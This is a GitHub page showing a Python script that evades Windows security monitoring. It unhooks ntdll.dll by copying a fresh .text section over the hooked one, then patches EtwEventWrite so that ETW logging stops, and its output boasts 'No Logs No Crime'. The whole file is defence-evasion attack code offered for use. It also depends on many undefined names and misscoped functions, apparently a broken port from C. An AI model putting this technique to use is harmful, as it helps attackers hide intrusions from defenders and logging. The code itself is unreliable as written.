-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathFuck-ETW-Pyrhon.py
121 lines (94 loc) · 4.28 KB
/
Fuck-ETW-Pyrhon.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
import ctypes
import sys
from ctypes import *
from ctypes.wintypes import *
def UnhookNTDLL(hNtdll, pMapping):
"""
UnhookNTDLL() finds .text segment of fresh loaded copy of ntdll.dll and copies over the hooked one
"""
oldprotect = DWORD(0)
pidh = PIMAGE_DOS_HEADER(pMapping)
pinh = PIMAGE_NT_HEADERS(DWORD(pMapping) + pidh.e_lfanew)
# find .text section
for i in range(pinh.FileHeader.NumberOfSections):
pish = PIMAGE_SECTION_HEADER(DWORD(IMAGE_FIRST_SECTION(pinh)) + DWORD(IMAGE_SIZEOF_SECTION_HEADER) * i)
if not strcmp(c_char_p(pish.Name), b".text"):
# prepare ntdll.dll memory region for write permissions.
VirtualProtect_p(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), pish.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, byref(oldprotect))
if not oldprotect:
# RWX failed!
return -1
# copy original .text section into ntdll memory
memmove(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), LPVOID(DWORD(pMapping) + pish.VirtualAddress), pish.Misc.VirtualSize)
# restore original protection settings of ntdll
VirtualProtect_p(LPVOID(DWORD(hNtdll) + pish.VirtualAddress), pish.Misc.VirtualSize, oldprotect, byref(oldprotect))
if not oldprotect:
# it failed
return -1
return 0
return -1
def FuckEtw():
oldprotect = DWORD(0)
pEventWrite = GetProcAddress(GetModuleHandleA(b"ntdll.dll"), b"EtwEventWrite")
if not VirtualProtect_p(pEventWrite, 4096, PAGE_EXECUTE_READWRITE, byref(oldprotect)):
print("[!] VirtualProtect Failed With Error : %d" % GetLastError())
return False
if sys.maxsize > 2**32:
memcpy(pEventWrite, b"\x48\x33\xc0\xc3", 4) # xor rax, rax; ret
else:
memcpy(pEventWrite, b"\x33\xc0\xc2\x14\x00", 5) # xor eax, eax; ret 14
if not VirtualProtect_p(pEventWrite, 4096, oldprotect, byref(oldprotect)):
print("[!] VirtualProtect Failed With Error : %d" % GetLastError())
return False
if not FlushInstructionCache(GetCurrentProcess(), pEventWrite, 4096):
print("[!] FlushInstructionCache Failed With Error : %d" % GetLastError())
return False
return True
def main():
Banner()
ret = 0
hFile = HANDLE(0)
hFileMapping = HANDLE(0)
pMapping = LPVOID(0)
CreateFileMappingA_p = WINFUNCTYPE(HANDLE, HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"CreateFileMappingA"))
MapViewOfFile_p = WINFUNCTYPE(LPVOID, HANDLE, DWORD, DWORD, DWORD, SIZE_T)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"MapViewOfFile"))
UnmapViewOfFile_p = WINFUNCTYPE(BOOL, LPCVOID)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"UnmapViewOfFile"))
VirtualProtect_p = WINFUNCTYPE(BOOL, LPVOID, SIZE_T, DWORD, PDWORD)(GetProcAddress(GetModuleHandleA(b"kernel32"), b"VirtualProtect"))
print("\n[i] Hooked Ntdll Base Address : 0x%p" % pLocalNtdll)
# open ntdll.dll
XORcrypt(sNtdllPath, sNtdllPath_len, sNtdllPath[sNtdllPath_len - 1])
hFile = CreateFileA(sNtdllPath, GENERIC_READ, FILE_SHARE_READ, None, OPEN_EXISTING, 0, None)
if hFile == INVALID_HANDLE_VALUE:
# failed to open ntdll.dll
return -1
# prepare file mapping
hFileMapping = CreateFileMappingA_p(hFile, None, PAGE_READONLY | SEC_IMAGE, 0, 0, None)
if not hFileMapping:
# file mapping failed
CloseHandle(hFile)
return -1
# map the bastard
pMapping = MapViewOfFile_p(hFileMapping, FILE_MAP_READ, 0, 0, 0)
if not pMapping:
# mapping failed
CloseHandle(hFileMapping)
CloseHandle(hFile)
return -1
# remove hooks
ret = UnhookNTDLL(GetModuleHandleA(sNtdllPath), pMapping)
print("[i] Unhooked Ntdll Base Address: 0x%p" % sNtdll)
# Clean up.
UnmapViewOfFile_p(pMapping)
CloseHandle(hFileMapping)
CloseHandle(hFile)
print("\n[+] PID Of The Current Proccess: [%d]\n" % GetCurrentProcessId())
print("\n[#] Ready For ETW Patch.\n")
print("[+] Press <Enter> To Patch ETW ...\n")
input()
if not FuckEtw():
return EXIT_FAILURE
print("\n[+] ETW Patched, No Logs No Crime ! \n")
print("\n")
return 0
if __name__ == "__main__":
main()